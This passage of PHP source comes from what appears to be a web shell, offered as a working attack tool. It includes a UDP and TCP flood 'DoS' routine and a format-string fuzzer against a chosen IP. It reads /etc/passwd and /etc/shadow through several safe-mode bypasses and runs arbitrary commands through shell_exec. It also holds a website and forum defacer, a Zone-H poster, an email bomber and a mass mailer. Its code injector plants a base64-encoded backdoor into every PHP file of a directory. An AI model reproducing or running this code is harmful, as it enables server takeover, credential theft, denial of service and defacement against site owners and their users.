4174 $maxTime = time() + $executionTime;;
4175 while($counter--)
4176 {
4177 $data .= "X";
4178 }
4179 $data .= " Dhanush";
4180
4181 while(1)
4182 {
4183 $socket = fsockopen("udp://$IP", $port, $error, $errorString, $timeout);
4184 if($socket)
4185 {
4186 fwrite($socket , $data);
4187 fclose($socket);
4188 $packets++;
4189 }
4190 if(time() >= $maxTime)
4191 {
4192 break;
4193 }
4194 }
4195 echo "Dos Completed!<br>";
4196 echo "DOS attack against udp://$IP:$port completed on ".date("h:i:s A")."<br />";
4197 echo "Total Number of Packets Sent : " . $packets . "<br />";
4198 echo "Total Data Sent = ". HumanReadableFilesize($packets*$no0fBytes) . "<br />";
4199 echo "Data per packet = " . HumanReadableFilesize($no0fBytes) . "<br />";
4200 }
4201}
4202else if(isset($_GET['fuzzer']))
4203{
4204 if(isset($_GET['ip']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && isset($_GET['no0fBytes']) && isset($_GET['multiplier']) && $_GET['no0fBytes'] != "" && $_GET['exTime'] != "" && $_GET['timeout'] != "" && $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['multiplier'] != "")
4205 {
4206 $IP=$_GET['ip'];
4207 $port=$_GET['port'];
4208 $times = $_GET['exTime'];
4209 $timeout = $_GET['timeout'];
4210 $send = 0;
4211 $ending = "";
4212 $multiplier = $_GET['multiplier'];
4213 $data = "";
4214 $mode="tcp";
4215 $data .= "GET /";
4216 $ending .= " HTTP/1.1\n\r\n\r\n\r\n\r";
4217 if($_GET['type'] == "tcp")
4218 {
4219 $mode = "tcp";
4220 }
4221
4222 while($multiplier--)
4223
4224 {
4225 $data .= urlencode($_GET['no0fBytes']);
4226 }
4227 $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers
4228 $data .= "by-Dhanush".$ending;
4229 $length = strlen($data);
4230
4231
4232 echo "Sending Data :- <br /> <p align='center'>$data</p>";
4233
4234 for($i=0;$i<$times;$i++)
4235 {
4236 $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout);
4237 if($socket)
4238 {
4239 fwrite($socket , $data , $length );
4240 fclose($socket);
4241 }
4242 }
4243 echo "Fuzzing Completed!<br>";
4244 echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."<br />";
4245 echo "Total Number of Packets Sent : " . $times . "<br />";
4246 echo "Total Data Sent = ". HumanReadableFilesize($times*$length) . "<br />";
4247 echo "Data per packet = " . HumanReadableFilesize($length) . "<br />";
4248 }
4249}
4250else if(isset($_GET['bypassit']))
4251{
4252 echo "<BR>";
4253 if(isset($_GET['copy']))
4254 {
4255 if(@copy($_GET['copy'],"test1.php"))
4256 {
4257 $fh=fopen("test1.php",'r');
4258 echo "<textarea cols=100 rows=20 class=box readonly>".htmlspecialchars(@fread($fh,filesize("test1.php")))."</textarea>";
4259 @fclose($fh);
4260 unlink("test1.php");
4261 }
4262 }
4263 else if(isset($_GET['filecontents']))
4264 {
4265 echo "<textarea cols=100 rows=20 class=box readonly>";
4266 echo file_get_contents($_GET['filecontents']);
4267 echo "</textarea>";
4268 }
4269 else if(isset($_GET['stream']))
4270 {
4271 echo "<textarea cols=100 rows=20 class=box readonly>";
4272 $file=$_GET['stream'];
4273 if ($stream = fopen($file, 'r')) {
4274 echo stream_get_contents($stream, -1, 0);
4275 fclose($stream);
4276 }
4277
4278 echo "</textarea>";
4279 }
4280 else if(isset($_GET['curl']))
4281 {
4282 $ch=curl_init("file://" . $_GET[curl]);
4283 curl_setopt($ch,CURLOPT_HEADERS,0);
4284 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
4285 $file_out=curl_exec($ch);
4286 curl_close($ch);
4287 echo "<textarea cols=100 rows=20 class=box readonly>".htmlspecialchars($file_out)."</textarea>";
4288 }
4289 else if(isset($_GET['include']))
4290 {
4291 if(file_exists($_GET['include']))
4292 {
4293 echo "<textarea cols=100 rows=20 class=box readonly>";
4294 @include($_GET['include']);
4295 echo "</textarea>";
4296 }
4297 else
4298 echo "<br><center><font size=3>Can't Read" . $_GET['include'] . "</font></center>";
4299 }
4300 else if(isset($_GET['id']))
4301 {
4302 echo "<textarea cols=100 rows=20 class=box readonly>";
4303 for($uid=0;$uid<60000;$uid++)
4304 {
4305 $ara = posix_getpwuid($uid);
4306 if (!empty($ara))
4307 {
4308 while (list ($key, $val) = each($ara))
4309 {
4310 print "$val:";
4311 }
4312 print "\n";
4313 }
4314 }
4315 echo "</textarea>";
4316 }
4317 else if(isset($_GET['tempnam']))
4318 {
4319 echo "<textarea cols=100 rows=20 class=box readonly>";
4320 $mytmp = tempnam ( 'tmp', $_GET['tempnam'] );
4321 $fp = fopen ( $mytmp, 'r' );
4322 while(!feof($fp))
4323 echo fgets($fp);
4324 fclose ( $fp );
4325 echo "</textarea>";
4326 }
4327 else if(isset($_GET['symlnk']))
4328 {
4329 echo "<textarea cols=100 rows=20 class=box readonly>";
4330 @mkdir("mydhanush",0777);
4331 @chdir("mydhanush");
4332 execmd("ln -s /etc/passwd");
4333
4334 echo file_get_contents($curr_url . "/mydhanush/passwd");
4335 echo "</textarea>";
4336 }
4337 if(isset($_GET['newtype']))
4338 {
4339 $filename = $_GET['newtype'];
4340 echo "<textarea cols=100 rows=20 class=box readonly>";
4341 if($_GET['optiontype'] == "xxd")
4342 echo execmd("xxd ".$filename);
4343 else if($_GET['optiontype'] == "rev")
4344 echo execmd("rev ".$filename);
4345 if($_GET['optiontype'] == "tac")
4346 echo execmd("tac ".$filename);
4347 if($_GET['optiontype'] == "more")
4348 echo execmd("more ".$filename);
4349 if($_GET['optiontype'] == "less")
4350 echo execmd("less ".$filename);
4351 if($_GET['optiontype'] == "awk")
4352 echo execmd("awk '{ print }' ".$filename);
4353 echo "</textarea>";
4354 }
4355 echo '<BR><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 2px;" /><BR><BR><BR>';
4356}
4357// Deface Website
4358else if(isset($_GET['deface']))
4359{
4360 $myfile = fopen($_GET['deface'],'w');
4361 if(fwrite($myfile, base64_decode($ind)))
4362 {fclose($myfile);
4363 echo "Index Defaced Successfully";}
4364 else
4365 echo "Donot have write permission";
4366}
4367else if(isset($_GET['perms']))
4368{
4369?><br>
4370 <form>
4371 <input type="hidden" name="myfilename" value="<?php echo $_GET['myfilepath']; ?>">
4372 <table align="center" border="1" style="width:40%;border-color:#333333;border-collapse:collapse;">
4373 <tr>
4374 <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
4375 </tr>
4376 <tr>
4377 <td colspan="2" align="center" style="height:60px">
4378 <input type="button" onClick="changeperms(chmode.value,myfilename.value)" value="Change Permission" class="but" style="padding: 5px;" />
4379 <input type="button" onClick="cancel()" value="cancel" class="but" style="padding: 5px;" />
4380 </td>
4381 </tr>
4382 </table>
4383
4384 </form>
4385 <?php
4386}
4387else if(isset($_GET["chmode"]))
4388{
4389 if($_GET['chmode'] != null && is_numeric($_GET['chmode']))
4390 {
4391 echo '<br>';
4392 $perms = 0;
4393 for($i=strlen($_GET['chmode'])-1;$i>=0;--$i)
4394 $perms += (int)$_GET['chmode'][$i]*pow(8, (strlen($_GET['chmode'])-$i-1));
4395 if(@chmod($_GET['myfilename'],$perms))
4396 echo "<center><blink><font class=txt>File Permissions Changed Successfully</font></blink></center>";
4397 else
4398 echo "<center><blink>Cannot Change File Permissions</blink></center>";
4399 echo '<BR><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" /><BR><BR>';
4400 }
4401}
4402else if(isset($_GET['rename']))
4403{
4404?><BR>
4405 <form>
4406 <table border="0" cellpadding="7" cellspacing="3">
4407 <tr>
4408 <td>File </td><td><input value="<?php echo $_GET['myfilepath'];?>" name="file" class="box" /></td>
4409 </tr>
4410 <tr>
4411 <td>To </td><td><input value="<?php echo $_GET['myfilepath'];?>" name="to" class="box" /></td>
4412 </tr>
4413 <tr>
4414 <td colspan="2"><input type="button" onClick="renamefun(file.value,to.value)" value="Rename It" class="but" style="margin-left: 160px;padding: 5px;"/>
4415 <input type="button" onClick="cancel()" value="cancel" class="but" style="padding: 5px;" />
4416 </td>
4417 </tr>
4418 </table>
4419 </form>
4420 <?php
4421
4422}
4423else if(isset($_GET['renamemyfile']))
4424{
4425 if(isset($_GET['to']) && isset($_GET['file']))
4426 {
4427 echo '<br>';
4428 if(!rename($_GET['file'], $_GET['to']))
4429 echo "Cannot Rename File";
4430 else
4431 echo "<font class=txt>File Renamed Successfully</font>";
4432 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" /><BR><BR>';
4433 }
4434}
4435else if(isset($_GET['open']))
4436{
4437 if(is_file($_GET['myfilepath']))
4438 {
4439 $owner = "0/0";
4440 if($os == "Linux")
4441 $owner = getOGid($_GET['myfilepath']);
4442 ?>
4443 <form>
4444 <table style="width:57%;">
4445 <tr align="left">
4446 <td align="left">File : </td><td><font class=txt><?php echo $_GET['myfilepath'];?></font></td><td align="left">Permissions : </td><td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo addslashes($_GET['myfilepath']); ?>')"><?php echo filepermscolor($_GET['myfilepath']);?></a></td>
4447 </tr>
4448 <tr>
4449 <td>Size : </td><td><?php echo HumanReadableFileSize(filesize($_GET['myfilepath']));?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
4450 </tr>
4451 </table>
4452 <textarea name="content" rows="15" cols="100" class="box"><?php
4453 $content = htmlspecialchars(file_get_contents($_GET['myfilepath']));
4454 if($content)
4455 {
4456 echo $content;
4457 }
4458 else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
4459 {
4460 if(filesize($_GET['myfilepath']) != 0 )
4461 {
4462 fopen($_GET['myfilepath']);
4463 while(!feof())
4464 {
4465 echo htmlspecialchars(fgets($_GET['myfilepath']));
4466 }
4467 }
4468 }
4469
4470 ?>
4471 </textarea><br />
4472 <input name="save" type="button" onClick="savemyfile('<?php echo addslashes($_GET['myfilepath']); ?>',content.value)" value="Save Changes" id="spacing" class="but"/>
4473 <input name="save" type="button" onClick="cancel()" value="Cancel" id="spacing" class="but"/>
4474 </form>
4475 <?php
4476 }
4477 else
4478 echo '<BR><input name="save" type="button" onClick="cancel()" value=" OK " id="spacing" class="but"/><BR>File does not exist !!!!<BR>';
4479}
4480else if(isset($_POST['file']) && isset($_POST['content']))
4481{
4482 echo '<BR>';
4483 if(file_exists($_POST['file']))
4484 {
4485 $handle = fopen($_POST['file'],"w");
4486 if(fwrite($handle,$_POST['content']))
4487 echo "<font class=txt>File Saved Successfully!</font>";
4488 else
4489 echo "Cannot Write into File";
4490 }
4491 else
4492 {
4493 echo "File Name Specified does not exists!";
4494 }
4495 echo '<BR><input type="button" onClick="cancel()" value=" OK " class="but" /><BR><BR>';
4496}
4497else if(isset($_POST["SendNowToZoneH"]))
4498{
4499 $hacker = $_POST['defacer'];
4500 $method = $_POST['hackmode'];
4501 $neden = $_POST['reason'];
4502 $site = $_POST['domain'];
4503
4504 if (empty($hacker))
4505 {
4506 die("<center><font size=3>[-] You Must Fill the Attacker name !</font></center>");
4507 }
4508 elseif($method == "--------SELECT--------")
4509 {
4510 die("<center><font size=3>[-] You Must Select The Method !</center>");
4511 }
4512 elseif($neden == "--------SELECT--------")
4513 {
4514 die("<center><font size=3>[-] You Must Select The Reason</center>");
4515 }
4516 elseif(empty($site))
4517 {
4518 die("<center><font size=3>[-] You Must Inter the Sites List !</center>");
4519 }
4520 // Zone-h Poster
4521 function ZoneH($url, $hacker, $hackmode,$reson, $site )
4522 {
4523 $k = curl_init();
4524 curl_setopt($k, CURLOPT_URL, $url);
4525 curl_setopt($k,CURLOPT_POST,true);
4526 curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
4527 curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
4528 curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
4529 $kubra = curl_exec($k);
4530 curl_close($k);
4531 return $kubra;
4532 }
4533
4534 $i = 0;
4535 $sites = explode("\n", $site);
4536 echo "<pre class=ml1 style='margin-top:5px'>";
4537 while($i < count($sites))
4538 {
4539 if(substr($sites[$i], 0, 4) != "http")
4540 {
4541 $sites[$i] = "http://".$sites[$i];
4542 }
4543 ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
4544 echo "<font class=txt size=3>Site : ".$sites[$i]." Posted !</font><br>";
4545 ++$i;
4546 }
4547
4548 echo "<font class=txt size=4>Sending Sites To Zone-H Has Been Completed Successfully !! </font></pre>";
4549}
4550else if(isset($_GET['executemycmd']))
4551{
4552 $comm = $_GET['executemycmd'];
4553 chdir($_GET['executepath']);
4554 echo shell_exec($comm);
4555}
4556// View Passwd file
4557else if(isset($_GET['passwd']))
4558{
4559 $test='';
4560 $tempp= tempnam($test, "cx");
4561 $get = "/etc/passwd";
4562 $name=@posix_getpwuid(@fileowner($get));
4563 $group=@posix_getgrgid(@filegroup($get));
4564 $owner = $name['name']. " / ". $group['name'];
4565 ?>
4566 <table style="width:57%;">
4567 <tr>
4568 <td align="left">File : </td><td><font class=txt><?php echo $get; ?></font></td><td align="left">Permissions : </td><td><?php echo filepermscolor($get);?></td>
4569 </tr>
4570 <tr>
4571 <td>Size : </td><td><?php echo filesize($get);?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
4572 </tr>
4573 </table>
4574 <?php
4575 if(copy("compress.zlib://".$get, $tempp))
4576 {
4577 $fopenzo = fopen($tempp, "r");
4578 $freadz = fread($fopenzo, filesize($tempp));
4579 fclose($fopenzo);
4580 $source = htmlspecialchars($freadz);
4581 echo "<tr><td><center><textarea rows='20' cols='80' class=box name='source'>$source</textarea><br>";
4582 unlink($tempp);
4583 }
4584 else
4585 {
4586 ?>
4587 <form>
4588 <input type="hidden" name="etcpasswd">
4589 <table class="tbl" border="1" cellpadding="5" cellspacing="5" align="center" style="width:40%;">
4590 <tr>
4591 <td>From : </td><td><input type="text" name="val1" class="sbox" value="1"></td>
4592 </tr>
4593 <tr>
4594 <td>To : </td><td><input type="text" name="val2" class="sbox" value="1000"></td>
4595 </tr>
4596 <tr>
4597 <td colspan="2" align="center"><input type="submit" value=" Go " class="but"></td>
4598 </tr>
4599 </table><br>
4600 </form>
4601 <?php
4602 }
4603 ?>
4604 <br />
4605 <input type="button" onClick="cancel()" value=" OK " class="but" /><BR><BR>
4606 <?php
4607}
4608else if(isset($_GET['shadow']))
4609{
4610 $test='';
4611 $tempp= tempnam($test, "cx");
4612 $get = "/etc/shadow";
4613 if(copy("compress.zlib://".$get, $tempp))
4614 {
4615 $fopenzo = fopen($tempp, "r");
4616 $freadz = fread($fopenzo, filesize($tempp));
4617 fclose($fopenzo);
4618 $source = htmlspecialchars($freadz);
4619 echo "<tr><td><center><font size='3' face='Verdana'>$get</font><br><textarea rows='20' cols='80' class=box name='source'>$source</textarea>";
4620 unlink($tempp);
4621 }
4622}
4623else if(isset($_GET['bomb']))
4624{
4625 ?><div id="showmail"></div>
4626 <form>
4627 <table id="margins" style="width:100%;">
4628 <tr>
4629 <td style="width:30%;">To</td>
4630 <td>
4631 <input class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/>
4632 </td>
4633 </tr>
4634 <tr>
4635
4636 <td style="width:30%;">Subject</td>
4637 <td>
4638 <input type="text" class="box" name="subject" value="Dhanush Here!" onFocus="if(this.value == 'Dhanush Here!')this.value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!';" />
4639 </td>
4640 </tr>
4641 <tr>
4642 <td style="width:30%;">No. of Times</td>
4643 <td>
4644 <input class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';"/>
4645 </td>
4646 </tr>
4647 <tr>
4648 <td style="width:30%;">Pad your message (Less spam detection)</td>
4649 <td><input type="checkbox" name="padding"/></td>
4650 </tr>
4651 <tr>
4652 <td colspan="2"><textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!</textarea></td>
4653 </tr>
4654 <tr>
4655 <td rowspan="2">
4656 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="sendmail('dobombing',to.value,subject.value,message.value,'null',times.value,padding.value)" class="but" value=" Bomb! "/>
4657 </td>
4658 </tr>
4659 </table>
4660 </form>
4661 <?php
4662}
4663
4664//Mass Mailer
4665else if(isset($_GET['mail']))
4666{
4667 ?><div id="showmail"></div>
4668 <div align="left">
4669 <form>
4670 <table align="left" style="width:100%;">
4671 <tr>
4672 <td style="width:10%;">From</td>
4673 <td style="width:80%;" align="left"><input name="from" class="box" value="Hello@abcd.in" onFocus="if(this.value == 'Hello@abcd.in')this.value = '';" onBlur="if(this.value=='')this.value='Hello@abcd.in';"/></td>
4674 </tr>
4675
4676 <tr>
4677 <td style="width:20%;">To</td>
4678 <td style="width:80%;"><input class="box" class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/></td>
4679 </tr>
4680
4681 <tr>
4682 <td style="width:20%;">Subject</td>
4683 <td style="width:80%;"><input type="text" class="box" name="subject" value="Dhanush Here!!" onFocus="if(this.value == 'Dhanush Here!!')this.value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!!';" /></td>
4684 </tr>
4685
4686
4687 <tr>
4688 <td colspan="2">
4689 <textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!! Patch your site.....</textarea>
4690 </td>
4691 </tr>
4692
4693
4694 <tr>
4695 <td rowspan="2">
4696 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="sendmail('massmailing',to.value,subject.value,message.value,from.value)" class="but" value=" Send! "/>
4697 </td>
4698 </tr>
4699 </table>
4700 </form></div>
4701 <?php
4702}
4703// Get Domains
4704else if(isset($_REQUEST["symlinkserver"]))
4705{
4706 ?>
4707 <center><table><tr>
4708 <td><a href=javascript:void(0) onClick="getdata('symlink')"><font class=txt><b>| Symlink Server |</b></font></a></td>
4709 <td><a href=javascript:void(0) onClick="getdata('symlinkfile')"><font class=txt><b>| Symlink File |</b></font></a></td>
4710 <td><a href=javascript:void(0) onClick="getdata('script')"><font class=txt><b>| Script Locator |</b></font></a></td>
4711 </tr></table></center><br>
4712 <div id="showdata"></div><?php
4713}
4714// Forum Manager
4715else if(isset($_REQUEST["forum"]))
4716{ ?>
4717 <center><table><tr><td><a href=# onClick="getdata('defaceforum')"><font class=txt size="4">| Forum Defacer |</font></a></td>
4718 <td><a href=# onClick="getdata('passwordchange')"><font class=txt size="4">| Forum Password Changer |</font></a></td>
4719 <td><a href=# onClick="getdata('massdeface')"><font class=txt size="4">| Mass Defacer |</font></a></td>
4720 </tr></table></center><br><div id="showdata"></div>
4721 <?php
4722}
4723// Sec info
4724else if(isset($_GET['secinfo']))
4725{ ?><div id=showdata></div>
4726<center><div id="showmydata"></div>
4727</center>
4728<br><center><font size=5>Server security information</font><br><br></center>
4729 <table class="btmtbl" style="width:100%;" border="1">
4730 <tr>
4731 <td style="width:7%;">Curl</td>
4732 <td style="width:7%;">Oracle</td>
4733 <td style="width:7%;">MySQL</td>
4734 <td style="width:7%;">MSSQL</td>
4735 <td style="width:7%;">PostgreSQL</td>
4736 <td style="width:12%;">Open Base Directory</td>
4737 <td style="width:10%;">Safe_Exec_Dir</td>
4738 <td style="width:7%;">PHP Version</td>
4739 <td style="width:7%;">Magic Quotes</td>
4740 <td style="width:7%;">Server Admin</td>
4741 </tr>
4742 <tr>
4743 <td style="width:7%;"><font class="txt"><?php curlinfo(); ?></font></td>
4744 <td style="width:7%;"><font class="txt"><?php oracleinfo(); ?></font></td>
4745 <td style="width:7%;"><font class="txt"><?php mysqlinfo(); ?></font></td>
4746 <td style="width:7%;"><font class="txt"><?php mssqlinfo(); ?></font></td>
4747 <td style="width:7%;"><font class="txt"><?php postgresqlinfo(); ?></font></td>
4748 <td style="width:12%;"><font class="txt"><?php echo $basedir; ?></font></td>
4749 <td style="width:10%;"><font class="txt"><?php if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font >NONE</font></b>";}else {echo "<font class='txt'>$df</font></b>";};} ?></font></td>
4750 <td style="width:7%;"><font class="txt"><?php phpver(); ?></font></td>
4751 <td style="width:7%;"><font class="txt"><?php magic_quote(); ?></font></td>
4752 <td style="width:7%;"><font class="txt"><?php serveradmin(); ?></font></td>
4753 </tr>
4754</table><br> <?php
4755 mysecinfo();
4756}
4757// Code Injector
4758
4759else if(isset($_GET['injector']))
4760{
4761 if($os != "Windows")
4762 $injectcode = "PD9waHAgJGNtZCA9IDw8PEVPRA0KY21kDQpFT0Q7DQoNCmlmKGlzc2V0KCRfUkVRVUVTVFskY21kXSkpIHsNCnN5c3RlbSgkX1JFUVVFU1RbJGNtZF0pOyB9ID8+";
4763 else
4764 {
4765 $injectcode = "PD9waHAgJHBhc3N3cmQgPSA8PDxFT0QKMWViODJhOTE1YzczNjMxZTZlYmEyM2QwYzE1ODZkMzQKRU9EOwokZGhwYXNzd2QgPSA8PDxFT0QKZGhwYXNzd2QKRU9EOwokdXBsb2FkZWQgPSA8PDxFT0QKdXBsb2FkZWQKRU9EOwokbmFtZSA9IDw8PEVPRApuYW1lCkVPRDsKJHRtcF9uYW1lID0gPDw8RU9ECnRtcF9uYW1lCkVPRDsKaWYgKGlzc2V0ICgkX0dFVFskZGhwYXNzd2RdKSBhbmQgbWQ1KCRfR0VUWyRkaHBhc3N3ZF0pPT0kcGFzc3dyZCkKez8+PGZvcm0gZW5jdHlwZT1tdWx0aXBhcnQvZm9ybS1kYXRhIG1ldGhvZD1QT1NUIGFjdGlvbj0+dXBsb2FkOiA8aW5wdXQgbmFtZT11cGxvYWRlZCB0eXBlPWZpbGUgLz48aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9VXBsb2FkIC8+PC9mb3JtPgo8P3BocCAKaWYoaXNzZXQoJF9GSUxFU1skdXBsb2FkZWRdWyRuYW1lXSkpCnsKJHVwbG9hZGVkID0gPDw8RU9ECnVwbG9hZGVkCkVPRDsKJHRhcmdldF9wYXRoID0gPDw8RU9ECi4vCkVPRDsKJHRhcmdldF9wYXRoID0gJHRhcmdldF9wYXRoIC4gYmFzZW5hbWUoICRfRklMRVNbJHVwbG9hZGVkXVskbmFtZV0pOwppZihtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1skdXBsb2FkZWRdWyR0bXBfbmFtZV0sICR0YXJnZXRfcGF0aCkpIHtlY2hvICR1cGxvYWRlZDt9fX0KPz4=";
4766 }
4767 ?>
4768 <form method='POST'>
4769 <table id="margins">
4770 <tr>
4771 <td width="100" class="title">
4772 Directory
4773 </td>
4774 <td>
4775 <input class="box" name="pathtomass" value="<?php echo getcwd().$SEPARATOR; ?>" />
4776 </td>
4777
4778 </tr>
4779 <tr>
4780 <td class="title">
4781 Mode
4782 </td>
4783 <td>
4784 <select style="width: 400px;" name="mode" class="box">
4785 <option value="Apender">Apender</option>
4786 <option value="Overwriter">Overwriter</option>
4787 </select>
4788 </td>
4789 </tr>
4790 <tr>
4791 <td class="title">
4792 File Type
4793 </td>
4794 <td>
4795 <input type="text" class="box" name="filetype" value="php" onBlur="if(this.value=='')this.value='php';" />
4796 </td>
4797 </tr>
4798 <tr>
4799 <td>Create A backdoor by injecting this code in every php file of current directory</td>
4800 </tr>
4801
4802 <tr>
4803 <td colspan="2"><?php if($os == "Windows")echo "<i>Default Password is : <b>Iamthelord#</b> (change to yours using MD5)</i> Example : .php?dhpasswd=Iamthelord#"; ?><BR>
4804 <textarea name="injectthis" cols="110" rows="10" class="box"><?php echo base64_decode($injectcode); ?></textarea>
4805 </td>
4806 </tr>
4807 <tr>
4808 <td rowspan="2">
4809 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="codeinjector(pathtomass.value,mode.value,filetype.value,injectthis.value)" class="but" value="Inject "/>
4810 </td>
4811 </tr>
4812 </form>
4813 </table><div id="showinject"</div>
4814 <?php
4815}
4816// Bypass
4817else if(isset($_GET["bypass"]))
4818{
4819 ?><center><div id="showmydata"></div></center>
4820 <table cellpadding="7" align="center" border="3" style="width:70%;border-color:#333333;border-collapse:collapse;">
4821 <tr>
4822 <td align="center" colspan="2"><font size="3">Safe mode bypass</font></td>
4823 </tr>
4824 <tr>
4825 <td align="center">
4826 <p>Using copy() function</p>
4827 <form onSubmit="bypassfun('copy',copy.value);return false;">
4828 <input type="text" name="copy" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('copy',copy.value)" value="bypass" class="but">
4829 </form>
4830 </td>
4831 <td align="center">
4832 <p>Using File contents function</p>
4833 <form onSubmit="bypassfun('filecontents',filecontents.value);return false;">
4834 <input type="text" name="filecontents" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('filecontents',filecontents.value)" value="bypass" class="but">
4835 </form>
4836 </td>
4837 </tr>
4838
4839 <tr>
4840 <td align="center">
4841 <p>Using Stream contents function</p>
4842 <form onSubmit="bypassfun('stream',stream.value);return false;">
4843 <input type="text" name="stream" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('stream',stream.value)" value="bypass" class="but">
4844 </form>
4845 </td>
4846 <td align="center">
4847 <p>Using Curl() function</p>
4848 <form onSubmit="bypassfun('curl',curl.value);return false;">
4849 <input type="text" name="curl" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('curl',curl.value)" value="bypass" class="but">
4850 </form>
4851 </td>
4852 </tr>
4853
4854 <tr>
4855 <td align="center">
4856 <p>Bypass using include()</p>
4857 <form onSubmit="bypassfun('include',include.value);return false;">
4858 <input type="text" name="include" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('include',include.value)" value="bypass" class="but">
4859 </form>
4860 </td>
4861 <td align="center">
4862 <p>Using id() function</p>
4863 <form onSubmit="bypassfun('id',id.value);return false;">
4864 <input type="text" name="id" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('id',id.value)" value="bypass" class="but">
4865 </form>
4866 </td>
4867 </tr>
4868
4869 <tr>
4870 <td align="center">
4871 <p>Using tempnam() function</p>
4872 <form onSubmit="bypassfun('tempnam',tempname.value);return false;">
4873 <input type="text" name="tempname" value="../../../etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('tempnam',tempname.value)" value="bypass" class="but">
4874 </form>
4875 </td>
4876 <td align="center">
4877 <p>Using symlink() function</p>
4878 <form onSubmit="bypassfun('symlnk',sym.value);return false;">
4879 <input type="text" name="sym" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('symlnk',sym.value)" value="bypass" class="but">
4880 </form>
4881 </td>
4882 </tr>
4883 <tr>
4884 <td colspan=2 align="center">
4885 <p>Using Bypass function</p>
4886 <form onSubmit="bypassfun('newtype',newtype.value,optiontype.value);return false;">
4887 <input type="text" name="newtype" value="/etc/passwd" class="sbox">
4888 <select id="optiontype" class=sbox>
4889 <option value="tac">tac</option>
4890 <option value="more">more</option>
4891 <option value="less">less</option>
4892 <option value="rev">rev</option>
4893 <option value="xxd">xxd</option>
4894 <option value="awk">awk</option>
4895 </select>
4896 <input type="button" OnClick="bypassfun('newtype',newtype.value,optiontype.value)" value="bypass" class="but">
4897 </form>
4898 </td>
4899 </tr>
4900 </table>
4901 </form>
4902 <?php
4903}
4904//fuzzer
4905else if(isset($_GET['fuzz']))
4906{
4907 ?>
4908 <form method="GET">
4909 <table id="margins">
4910 <tr>
4911 <td width="400" class="title">
4912 IP
4913 </td>
4914 <td>
4915 <input class="box" name="myip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
4916 </td>
4917 </tr>
4918
4919 <tr>
4920 <td class="title">
4921 Port
4922 </td>
4923 <td>
4924 <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
4925 </td>
4926 </tr>
4927
4928 <tr>
4929 <td class="title">
4930 Timeout
4931 </td>
4932 <td>
4933 <input type="text" class="box" name="time" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';"/>
4934 </td>
4935 </tr>
4936
4937
4938 <tr>
4939 <td class="title">
4940 No of times
4941 </td>
4942 <td>
4943 <input type="text" class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';" />
4944 </td>
4945 </tr>
4946
4947 <tr>
4948 <td class="title">
4949 Message (The message Should be long and it will be multiplied with the value after it)
4950 </td>
4951 <td>
4952 <input class="box" name="message" value="%S%x--Some Garbage here --%x%S" onFocus="if(this.value == '%S%x--Some Garbage here --%x%S')this.value = '';" onBlur="if(this.value=='')this.value='%S%x--Some Garbage here --%x%S';"/>
4953 </td>
4954 <td>
4955 x
4956 </td>
4957 <td width="20">
4958 <input style="width: 30px;" class="box" name="messageMultiplier" value="10" />
4959 </td>
4960 </tr>
4961
4962 <tr>
4963 <td rowspan="2">
4964 <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('fuzzer',myip.value,port.value,time.value,times.value,message.value,messageMultiplier.value)" class="but" value=" Submit "/>
4965 </td>
4966 </tr>
4967 </table>
4968 </form><div id="showdos"></div>
4969 <?php
4970}
4971// Zone-h Poster
4972 else if(isset($_GET["zone"]))
4973 {
